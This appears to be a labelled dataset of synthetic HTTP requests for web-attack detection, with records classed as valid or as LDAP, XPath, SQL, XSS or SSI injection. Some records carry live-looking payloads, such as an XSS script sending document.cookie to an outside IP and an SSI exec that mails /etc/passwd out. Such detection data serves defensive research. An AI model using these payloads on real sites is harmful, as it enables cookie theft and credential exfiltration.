Max-Forwards: 4
MIME-Version: 4.5
Pragma: p3dAvtwe=oostHd
Proxy-Authorization: Digest realm
Authorization: NTLM c2VtT2hidGV0bGFvYWFpdHJjcnJveW5nWGU5aWFsYm5o
Range: 8-37516,632-3136,508-1
Referer: /etpnbs/OmGk/e5irn/kobm7e6e/lwae8va0.tiff
TE: deflate;q=0.3
Trailer: Connection
User-Agent: Mozilla/8.3 (compatible; Konqueror/4.4; Mac OS X; t7IUe)
UA-CPU: PowerPC
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x4645
Via: 9.8 www.drheja9.png, FTP/7.7 28.232.213.249:30101, eahri/0.3 242.198.115.187
Transfer-Encoding: compress
Upgrade: afyagd/6.9, Lcmr8/4.4, yHo8/4.4, oeeIe8/7.6
Warning: 703 www.itpfele.gif "2bdi" "Thu, 20 Oct 05 06:22:20 GMT"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 23397
Start - Id: 18832
class: Valid
GET /tal/tP4ytXbl7t1EKw/iIs/nPttzxHOgrflaedx/oJOsK/cid/s@SI-/oboanri/czfih05cs4etYmq/ek8zDOQNFd.aspx?nnmmhlLse=tS20.gF_5&reloiyte=vgtm&rvrm3eY=10975671&igoQ=tael&iseirafE1=alibtusrzicktnetcatenj%7Co&sw=7&unyp=WarclRkc&NWnmj7boot.inicFQJI=2284934062&Lbca=wrnr0&15to=a HTTP/1.1
Host: 132.124.165.28
Connection: cnres
Accept: audio/x-wav;q=0.9, audio/*
Accept-Charset: iso-8859-8;q=0.0
Accept-Encoding: 
Accept-Language: teyizbyf-etl
Cache-Control: no-transform
Client-ip: 208.166.219.41
Cookie: rng=e8Ncmda;roo7tbOt=0rth2uo;jagzi=4s5nTnl4k7fVn
Cookie2: $Version="719"
Date: Wed, 09 Sep 09 20:56:43 GMT
ETag: W/"qB@Ea31vyZ0pjGeJh8"
Expect: 100-continue
From: rh6ooe@vea9Boente.gov
If-Modified-Since: Sat, 13 Dec 08 22:30:46 CET
If-Unmodified-Since: Thu, 22 Oct 09 13:47:10 UTC
If-Match: *
If-None-Match: *
If-Range: "ddDAwu.-Au--W8i"
Max-Forwards: 00
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: ishl 5ute=bsrhted
Authorization: Digest response="8C02AC0dF76A450C575CD9aeFACeccEf"
Range: -9,1224-02
Referer: /gwsttoc/oet6/nsTa1th/cgtote.zip
TE: deflate;q=0.6,deflate;q=0.5,trailers
Trailer: Accept
User-Agent: taUeuffE (ismwCloHE; um4oBvR; ohjqWUAD; o2o5sZ; pXQCgoN)
UA-CPU: x86
UA-Disp: 888,993,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4147x8311
Via: 9.0 83.118.95.38
Transfer-Encoding: compress
Upgrade: saO/9.8, oapyT/9.3, zrdrev/7.9, dar7eo/8.4
Warning: 106 www.dh2mlt.jpeg "hscobuAtozegsiEt" "Fri, 20 Jul 07 24:32:32 CET"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18832
Start - Id: 37385
class: LdapInjection
GET /window.opens9eSwheressIj/paa6c90/thNV@JUFGOKo.YKF/duLGF1/okeri/rlhIY/Htpehf8nsepiathz/xB.mspx? HTTP/1.0
Host: www.stieide.ch
Connection: teslau
Accept: */*
Accept-Charset: x-mac-korean;q=0.6, iso-8859-1;q=0.8
Accept-Encoding: )  ( |(displayName=had*)   (name   =  had*)(mail=had*)
Accept-Language: *
Date: Wed, 14 Dec 05 09:36:58 UTC
Expect: eaertym
If-Modified-Since: Wed, 28 Jan 04 11:00:08 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 571
Pragma: no-cache
Authorization: NTLM RUhkaTh0SW1kd25oemZhaXNobG5hcmVuZThvYVNldHN1dGh1cg==
Referer: /asmag/eprieon.htm
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 8.9; no-8a; rv:4.2.4) Gecko/34929225
UA-CPU: 68000
Transfer-Encoding: eeaeds; anmsuhtt=ogeseii

null

End - Id: 37385
Start - Id: 22004
class: Valid
GET /kPApygvkjv/VRi@7f5vGmDjG/nytrtwoooraesvo/SL49/nugiik1e3lznot/D5l/ZUaid8/_q4XallWU6/o@9mcBK/deNn2lrVKbz0Hw.tiff? HTTP/1.1
Host: 17.158.228.140
Connection: esdA6
Accept: image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5e3ionR-arnryEte;q=0.8, fl-xehqKrnH, onl-ow5nat;q=0.3, hzs-nsenpi
Cache-Control: min-fresh=739
Client-ip: 176.27.124.68
Cookie: tv7Hocehi=rotmp2iezlicatd2E i[Hinull
Cookie2: $Version="91"
Date: Thu, 15 Sep 05 18:13:30 UTC
ETag: W/"y@a9fTus_RQlTN96"
Expect: oeOybast=roeen;keie
From: egras@fbeiEuuht.cz
If-Modified-Since: Wed, 22 Nov 06 03:31:33 UTC
If-Unmodified-Since: Sun, 09 Nov 08 13:57:52 GMT
If-Match: *
If-None-Match: "rtyfktxNJsTjYD8gt"
If-Range: Mon, 17 Mar 08 01:24:48 CET
Max-Forwards: 625
MIME-Version: 2.6
Pragma: ewzEn0gs='etHss'
Proxy-Authorization: qINaqa tiYrlrf=Ergen
Authorization: asEl rosue=nEoYmsee
Range: 048-5458,87200-
Referer: /soee30/heea/rEae/ztjrn/eojiDzsn.tiff
TE: gzip,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 7.4; im-4r; rv:2.8.5) Gecko/05457650
UA-CPU: Sparc
UA-Disp: 514,290,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3071x562
Via: 2.8 18.60.178.211, 9.7 www.rjtdsamt.htm
Transfer-Encoding: gzip
Upgrade: pufgp/8.1, Wcil/8.8
Warning: 733 11.89.186.149:80395 "miozden" 
X-Forwarded-For: 193.72.214.78
X-Serial-Number: 920022590702
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22004
Start - Id: 49441
class: XPathInjection
GET /a29ns/nim2rulngodo.tiff?F7EYIM=peMhejeh&alE=066521&BFMTtolog5a=xp_reti%29%7CetopcnA%5B&ccl=objectorsdstt&AstenaDodaeDh=1%5C%3FFeecatinpute%5Dnsbgsoundee%24%40e%3By&diawSnnrnri46e=41023&iatgaiw=6773+++++or+++++1%3C++evat3%2Fa%2Fprhp%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D141%5D+or++++32%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&lsIaa=eezigC&OHB3CcIKKyT=op&eeoetbe=37&iotmsUylategw=ixwcjoss&jhioeqruhjEoshr=ap68KDE4cK&iat=dwml+i3+rcpt%3Aynode&szTAwtmp-7F=maageeumt8&Sbdt7twehaZa=nbdp0iiDdci%3Bc HTTP/1.0
Host: 135.76.118.74
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="59"
Date: Fri, 30 Jun 06 02:28:59 GMT
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Wed, 29 Oct 08 05:01:57 GMT
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: *
If-None-Match: "RLZiUwFUpGCRBZk7apkN"
If-Range: Tue, 12 Apr 05 10:44:51 UTC
Max-Forwards: 762
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: ei93ee ontr=ia8Itr1b
Range: 60-32,32547-,55039-
Referer: /bh4A/oneg8/ja9msy/nmeekaa/oNmte.asp
TE: trailers
Trailer: User-Agent
User-Agent: b9a7t0/8.2.4.4
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: 4.8 119.207.122.125, 5.5 www.8iftnhfa.gif
Transfer-Encoding: deflate
Upgrade: age/5.9, Rsxut/5.9, UadKd0/0.6, p3s6/2.5, oq9/7.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49441
Start - Id: 37733
class: LdapInjection
GET /rcVDbkMcs3CKed/r7fWb045/ueO569msdfbaa2iare/knuners/osxsbpthhicQaoe/arwIpcuIbt98/ef/35ohli5kdrlheago/rKHqd.SMm9jwn/actw6Arz/lHQY-CpKEEH4/Qfnph-W2F.IA.shtml?NRsystem-funion=pArlA8telk&sP=m0ZgJ7EYjfle&4ahdmmcEdertnco=fDn&tts5mo6=olsirvararcteesdnetcat&ixsaeolch=tn%29%28%26%28objectClass+%3Dhbd*%29&Krym@anode8GTng=667&AsoihbtSrlld=+Tcrb9apxwo+u&ge28isr=6&4M5IYUxhj=tivH HTTP/1.0
Host: 212.178.179.232:80
Connection: keep-alive
Accept: application/*, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 8.5.79.74
Cookie: ioirui=0t
Cookie2: $Version="8"
Date: Tue, 27 Jan 04 20:55:29 UTC
ETag: "5II8sc8ciUVdrRtHqjP"
Expect: fniL
From: 9tgIi@Iie7diRuwn.fr
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Sun, 09 Jul 06 10:06:12 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Apr 06 05:47:16 CET
Max-Forwards: 5886
Pragma: 9c3erb='o'
Authorization: Basic dXR4ajpsamRQdGg=
Referer: http://eoek.org/tb2rZla.cfm
Trailer: From
User-Agent: osahgflnmp (os93d0yCL)
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
Via: 7.2 www.rciTguif.jpeg, 0.1 115.201.125.201
Transfer-Encoding: gzip
Upgrade: 4da/3.4
Warning: 042 159.74.80.149 "suceomxh0hepmsponr2" 
X-Forwarded-For: 33.253.224.201
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37733
Start - Id: 19545
class: Valid
GET /ePdI6.bin?iiluk=4&upc9Oolo=nlP&bdlenghkjmEnogt=mH29CYO&tj7RtogfO=e-2&Mscriptup2=0144506&a8x7hiersoireot=oH%3D7Zdee&gmnToani=610 HTTP/1.1
Host: 210.108.198.217
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish
Accept-Encoding: *
Accept-Language: ujl-2hgw
Cache-Control: nM='f2'
Client-ip: 235.21.176.99
Cookie: hle=oneN;6im=%ZTwo;9y=ryytteEtaunroi1et;-YYdivy@T1insertbc=sye;access_logwDa/&i;ovrynCe5nio=seawgNrti3nt;2gt3=048
Cookie2: $Version="4"
Date: Tue, 19 Jan 10 09:39:29 GMT
ETag: "pwhBmkWUsY.qmAUm8"
Expect: 100-continue
From: ogeen@6fmx.ch
If-Modified-Since: Sun, 09 Dec 07 23:45:06 UTC
If-Unmodified-Since: Sun, 27 Feb 05 06:10:47 CET
If-Match: "JVcZynwGilE42jddDrxa"
If-None-Match: "SCoj_9sYDwa9JMEYxWI"
If-Range: Wed, 27 Jan 10 05:59:49 CET
Max-Forwards: 426
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: Basic TjNZbTI6Smw0MW4=
Range: 156-,0-
Referer: http://www.o5kbnern.biz/osnWtct/tnrqi0.jpg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 1.1; ig-bf; rv:5.3.3) Gecko/47806345
UA-CPU: StrongARM
UA-Disp: 146,7651,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 690x0416
Via: 4.9 www.ieizh.css, 1.8 www.fiTi.jpg
Transfer-Encoding: gzip
Upgrade: blY3i/9.6
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 00842
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19545
Start - Id: 47298
class: XSS
GET /tkcXcYQDgVRMB-3L2C/x1kz./idxMWAYB6jNNcatgthtacces/bse/beoetaceenaTrtdaonb6/s@inxLAyON__KH_yfBU/ede/jLItlWfLepmk0eMP/6YKWI_eXf0aV/e5QfgThoUNI.php4?zgrk9eesIn5hk=95081&uq=+oaaautoexec&eWoeEtejm44=%26%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F203.96.83.252%2Fto.dll%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&ormttrGyiii838=4&ai=rnje9ciRf8ehyeeiex&sietfhraanrvl=9712421 HTTP/1.1
Host: www.wen1erdtrc.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.8, iso-8859-9
Accept-Encoding: 
Accept-Language: niSun-ncn, mtYHd-tftofhko;q=0.0, jojAcsdu-ehe, g-raaeluxi;q=0.9, zehsah3-ttershe;q=0.9
Cache-Control: min-fresh=05
Client-ip: 59.59.14.219
Cookie: tSeNohsa7=5e6tMa~uvyamc ;ecIirFygr=Fwindow.openrfnnwp-e-&v $2esbgsound9open;ulqmTeshjnlesu=40405630;shutdowntW@xtermFmTp=teslog;owd3ehnftn=4481
Cookie2: $Version="1"
Date: Wed, 14 Apr 10 12:04:53 CET
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: eeiu8=vi8oqoxb;sDze
From: etiosA@ol5yehtiwE.org
If-Modified-Since: Wed, 12 Dec 07 13:55:35 GMT
If-Unmodified-Since: Thu, 13 Mar 08 16:58:42 GMT
If-Match: "k1PfBSPcT4NXl0_Tw7"
If-None-Match: "0F091VtTg8z.g_oXt"
If-Range: Fri, 11 Mar 05 15:25:06 UTC
Max-Forwards: 4
MIME-Version: 1.9
Pragma: lrs9et=yr0Ioh
Proxy-Authorization: Digest realm
Authorization: jisdwr reuzro=cttadT
Range: -4,7256-5,39-5314
Referer: http://www.iEutrlis.org/Dgdbn/uCx9/atgee/nhEp.php
TE: trailers,trailers,deflate;q=0.9
Trailer: User-Agent
User-Agent: iV50u@ioKL http://www.imIdtR.uk
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/0.9 159.37.35.173
Transfer-Encoding: deflate
Upgrade: 8iiKe/2.0, iiEe/4.6, ywedbe/9.1, aapo/1.4, Pjtu/9.8
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 7.96.3.255
X-Serial-Number: 1360027
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47298
Start - Id: 17309
class: Valid
GET /s@HyN3p6qk@5x93qVtw/shp/cfx@WS/tmpmRLoIwXQ_ubgsoundVnH/mlD4vwvmocha/yQV0Iop8Nfm/rUSZKKRB/oin/oal4a7lrEmoeneiS.asmx? HTTP/1.0
Host: 139.234.185.56:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 205.198.199.187
Cookie: Sxlltirs=5303084;athkal=ot94;e8ecna1=oinyherdu
Cookie2: $Version="6"
Date: Wed, 24 Jan 07 16:13:11 UTC
ETag: W/"z7ZIhf6.P0MN21t42TF"
Expect: 1ne3oe
From: jceguo@bleacd.st
If-Modified-Since: Sat, 23 Oct 04 21:00:28 UTC
If-Unmodified-Since: Wed, 17 Oct 07 02:55:15 CET
If-Match: "xEKX.Q9HcCJZw05"
If-None-Match: *
If-Range: "WnL.8rJeBFhmuJ_QB8"
Max-Forwards: 10
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: NTLM ZW8zZW5xMmFoc2xvb3V6amxwU2VmNmh3b1VJc2FveGxlR3RjZWc=
Range: -931680,-79387,-6
Referer: http://tocso.biz/eeur.jsp
TE: trailers,deflate,gzip;q=0.5
Trailer: Pragma
User-Agent: rPe3Wq http://www.mzar.uk
UA-CPU: Sparc
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: HTTP/2.4 www.vkteac8D.htm:98592, 3.8 62.81.169.150:16768
Transfer-Encoding: compress
Upgrade: ikwg/5.7, sm8ess/6.1
Warning: 113 www.scrt.css "niweICl" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17309
Start - Id: 35150
class: SqlInjection
PUT /0I_O1U7B7C1R6.NS5XQ/32/oaruevn/ytUtge7icfnGbac/Qet2hJUuvlogUpSUT/iU6cln4JO/4m1siedsHTtruuUus/eku96W7HIo/rrehulmdt/asmeoen.pl? HTTP/1.0
Content-Length: 248
Content-Language: uhicy,felin,L
Content-Encoding: compress
Content-Location: /to6eee.swf
Content-MD5: cnU4dG5pZWFhbmdsVGR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Oct 08 06:28:06 UTC
Last-Modified: Sat, 24 May 08 09:28:07 UTC
Host: 173.48.138.55
Connection: iz5licii
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="7"
Date: Fri, 16 Mar 07 13:33:29 UTC
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Sun, 22 Jan 06 09:10:46 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 0
MIME-Version: 1.4
Pragma: o1cee=sg
Proxy-Authorization: Digest username="e7tedn"
Authorization: Basic ZDJlbjp0bGFsZjRu
Range: -960786
Referer: /rooi/bihrdngh.shtml
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: uj2tOxMedD http://www.pcadi.biz
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: compress
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 795 202.58.110.230 "nyEakndeio" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

siuut1onetesip=454138&ar=n:&79pFAi=dAhzxo67q&Odotoou1riado=s6lb2 xtee;]o&ialde=ee&NQVUe-31=rl58&hqab=6197692&EpEtwfluNmr=or     0<>(select    count(*)     from     yblief)&naonEsds=zh1tqCkTIe&smvbgo=nacohquagfatsq&aYe=j+oI lhat9

End - Id: 35150
Start - Id: 5272
class: Valid
POST /eHbyoIF-b9rT/3oobeptpmad7taahs/ahj3us/fXPjbyPIbx/utacnuuhr/tRsaaioadrny/htco5yucetdoexm1/eoalzieennhnasH8/cTSF6aX3QV/t9DWRJzBvuF3.shtml? HTTP/1.1
Content-Length: 9
Content-Language: edi
Content-Encoding: identity
Content-Location: http://xEz2eui.it/ooe0EnH/tpesfmyi.php4
Content-MD5: aXNoa3RDdTRlbHFydW9kdg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Nov 05 10:37:12 CET
Last-Modified: Sat, 16 Dec 06 20:18:56 CET
Host: www.aeey9e.cz:452
Connection: close
Accept: */*;q=0.8
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: ea-oiu;q=0.5, ol48-te;q=0.5, l-qE3Etbq, 8msnshSI-iEaIdt2t, wotFe-6uh;q=0.0
Cache-Control: max-stale
Client-ip: 17.116.214.161
Cookie: eoroVIaciteaa=atonhEts Enph-u\a;9FCqhtacces=ttoope)4l ;ui=85844
Cookie2: $Version="07"
Date: Fri, 11 Jan 08 14:38:13 GMT
ETag: W/"Mej5kgQmiW7JuL0Ca"
Expect: 100-continue
From: anun@nmcev.org
If-Modified-Since: Tue, 20 Jan 04 17:50:54 UTC
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: *
If-None-Match: "WnurjKoIfvoj706X"
If-Range: Sat, 03 Jan 04 23:43:19 UTC
Max-Forwards: 8
MIME-Version: 9.4
Pragma: o9fo=g2C
Proxy-Authorization: sabs4 b0u0a=teeanu
Authorization: Basic TmV0YW86bGFhdHBzcG8=
Range: -400
Referer: /Fefnh/fmEdt6wu/naeOhev.tar.gz
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 3.8; dm-ip; rv:1.6.7) Gecko/67502291
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/1.5 www.mrihaa.css
Transfer-Encoding: euSa6e
Upgrade: ils/2.7, sefi/2.9, rbjh/3.8, 6ir/1.4
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 76349451666157165
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

dh4wll2=1

End - Id: 5272
Start - Id: 41206
class: SqlInjection
GET /75dZY6IRbwwZf-Gl/Taspri1ta/acei/.autoexecmbAwinntbscript/81tiyo7/CoviP1OXxtermbwindow.openeaLU/iH/2MdfSsvuo4aommhw/readmajw/qcr5aymmIibe2wk/uamhsyhLawlT.php4?t1a7elirhLz=757611&nrapeh0=o4Kaw9PwT&lefalaao11=icmdpe&_ftpGF9eAqLS=nlin&hnh6iraa=hmn&6l2b2lD=77348&aav9l=cHulti%28autoexecepositionen&ndytyssoxaree=2rMtcst6am7 HTTP/1.1
Host: 162.41.27.29
Connection: tgo1rr
Accept: text/plain;q=0.9, text/html;q=0.2
Accept-Charset: x-mac-greek;q=0.8, iso-8859-15;q=0.9, x-mac-chinesesimp;q=0.5, iso-8859-8
Accept-Encoding: ' )/**/UNIONALL/**/SELECT/**/89/**/FROM/**/7eo/**/WHERE/**/( ''  =  '/**/
Accept-Language: *;q=0.4
Cache-Control: max-age=43179
Client-ip: 116.254.118.56
Cookie: sRsieie=ei;cr=36Tlc;div-4null=480;lesnluAsld=T4hfh;tttStAem1=dffBwj0vY-;asoslcts0ow=00405864
Cookie2: $Version="2"
Date: Tue, 10 Jan 06 04:35:22 GMT
ETag: "y_rtOdxyriRe@WzUIbK"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: tercor@topretr.biz
If-Modified-Since: Sun, 30 Apr 06 01:53:50 UTC
If-Unmodified-Since: Sun, 07 Sep 08 23:57:51 GMT
If-Match: "LxQep3sUwbPank@KS-Kf"
If-None-Match: "7dEOX6ERtmr7NHcFUO"
If-Range: "sQ86Wd68_f7SuJkc9gK"
Max-Forwards: 6
MIME-Version: 0.2
Pragma: sH=iteOedsg
Proxy-Authorization: Digest uri=http://www.aabnei.st/T2mnZiu/n1sace/ntAt/ohsoyate.jsp
Authorization: Basic b1N0Z1M5ZXI6M3lob3M=
Range: 53-4,37-,6-8482
Referer: /3mstemr/ahSrer.gif
TE: trailers
Trailer: Expect
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 8.3; tl-aa; rv:3.0.7) Gecko/76411950
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9140x4441
Via: 7.0 185.89.50.166, HTTP/1.4 www.weseGne.js
Transfer-Encoding: identity
Upgrade: Ailo/4.2, 33e/8.5, daA/4.6, rId/6.3, euOe/7.5
Warning: 023 www.aubonl.html "brwUpele7rpookpse" "Tue, 09 Mar 10 24:01:48 CET"
X-Forwarded-For: 193.219.83.250
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41206
Start - Id: 18573
class: Valid
GET /a0egna-H0/nPThLr5qLV4s-yG4d34l/lOU1G9CLZxtXta/pGd0k@-hi66fsA/MNaIPBlZRopt/hREienm/@8R3izPEZgte/stalItnfBxoc0kedkos/oaaulp7ola1/ao/h200ZCbRs/mBSM-IO.tiff?sa1eecahiSGui=bj2eEAPd&rlOEdnu4tx=texece&7gjoriilwamce=twb6necn&durwoT4tutFE=910225&pNsji=z+&x1=sLz9eH4sBN&este0viWTImohon=o0.h7gh&3TGNnodeAM=aadmins HTTP/1.1
Host: www.shhghasise.cz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-5;q=0.0
Accept-Encoding: identity, gzip;q=0.1, identity;q=0.1
Accept-Language: uljhdvg-toiars, diNf-ilqrta;q=0.4, nuq-w;q=0.2, otdcvee-h;q=0.4
Cache-Control: no-store
Client-ip: 82.193.57.231
Cookie: oefh8e2gne=null=TL?ssrbavrtdocumentyf;et51io=23879287;uueeZheswor5aon=~upqOy<ranullea;Dr=92729149
Cookie2: $Version="394"
Date: Sun, 12 Apr 09 24:03:14 UTC
ETag: "seZrZcY201BJTWfCzn"
Expect: 100-continue
From: tyie@t8hupt4y.biz
If-Modified-Since: Sun, 22 Apr 07 24:05:25 UTC
If-Unmodified-Since: Sun, 14 Sep 08 20:34:33 UTC
If-Match: *
If-None-Match: "SDiPiTeA8W.jW7Nk"
If-Range: "t@xYDWGluoprXFYAcx"
Max-Forwards: 5
MIME-Version: 3.4
Pragma: nosbnmAt='v5ttbe'
Proxy-Authorization: Basic cGJlZXN0OnplSUFt
Authorization: hire8d fCeA=te8Ceydf
Range: -49105,7-,-99029
Referer: http://www.orrtiryn.it/AiTVef.php
TE: trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/4.6 (compatible; ehneiheih; Open BSD i586; ueha4Vu; ogsHsph; rxsnobeuN)
UA-CPU: x86
UA-Disp: 973,9699,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 924x1764
Via: 9.7 96.121.160.179:00496
Transfer-Encoding: deflate
Upgrade: nwhsoz/5.6, ahe/8.5
Warning: 223 151.230.160.155 "9e8eoa0eiupts" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 507234397267768
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18573
Start - Id: 39899
class: SSI
GET /r0H0ly@fDH7JwrzprE/A8-/lsr6or3Adfcow3/dIB/ff8xiRsaeneioa/rsr1/ekbAahWiet5al/Im53taacttjdfr/56ayeInezni8e1ee9pa/3sjqirrk/a.yd3DWHVlQXupk.tiff?hchearo=791&fqM=ko&e8etigbssdh4=resystemvf&CgEImsTAG1b=srlIraqsTSOss HTTP/1.0
Host: www.xsoettLcz7.uk
Connection: osoncuc
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dZi-nojcems;q=0.2, st-3;q=0.9, Ads-arsCl
Cookie: tu2esomdNjJgoeh=qSrtArciahmseTt;ee78aiunutsga=aipasswdstehseasko;AZ8eQ_p.gsTg=<!-- #exec     cmd="/bin/mail     tnuhmoO.com     <   /etc/passwd"-->;TMBinsertuJH_=dacceptle 28Tt;tua8Y9ieeeEs=tu=u5ny1a
Date: Wed, 26 Aug 09 11:07:55 UTC
ETag: "o18BSqI7OvnpJywNS00"
If-Match: *
Proxy-Authorization: NTLM aWhyUTg2ZWVyZE5kbm9Fem5uc21Tcm90ZXRmYWFhZWRyYzI4YnNvdHNlaWxj
Range: 842323-9393,06-9
Referer: /7feoErzi/9iadyfnr.mpg
User-Agent: 55dselpe (riFnahk7SK; hP2Yic.S; tl9t9A0)
X-Serial-Number: 689605522983498

null

End - Id: 39899
Start - Id: 19626
class: Valid
GET /clra7jrtJtgwan0jR/e8olheetcro/Ehsi9aswe5ho26nPh/1iedi/izhpnsraminrke4dmnee/3oesyvlnAe/TPi1.asp?RGos=1&aor2baoebnlbate=7&rtjwindow.open=Ecirt&etsr4eNneu=63164&bHIwindow.openGps=Hjt&bnbOnemq=%7Eeeep%2Fme4gaccept+e%5C2%28s&1bAwcnibmb=m%27&B_qkb=5&eajiraec=Eexp%24i&YdeleteaZ1VVP7=0be&hlfuhunaerN=6jtfQEGy&gCBcpqFA=d1%28tt&ntitttq=135519561&w4NtoncreTyerna=eepzdtsd9ah&w.Adbgsound=ien3t0xrFmtlh HTTP/1.1
Host: www.09tdeeg.st:1391
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.5
Accept-Language: n3heynOi-bfis;q=0.1, NHaeol-qaU;q=0.3, 9rzcme-Ieexi, w-M7eh1
Cache-Control: max-stale=57
Client-ip: 79.76.165.215
Cookie: lnubsyheoelc0=/ewk';sX4fvq=tCs.vbwI;dthaf7iR=ctit0t
Cookie2: $Version="17"
Date: Wed, 13 Jun 07 03:32:31 CET
ETag: "gwWlvqw-Hsu3xuRd"
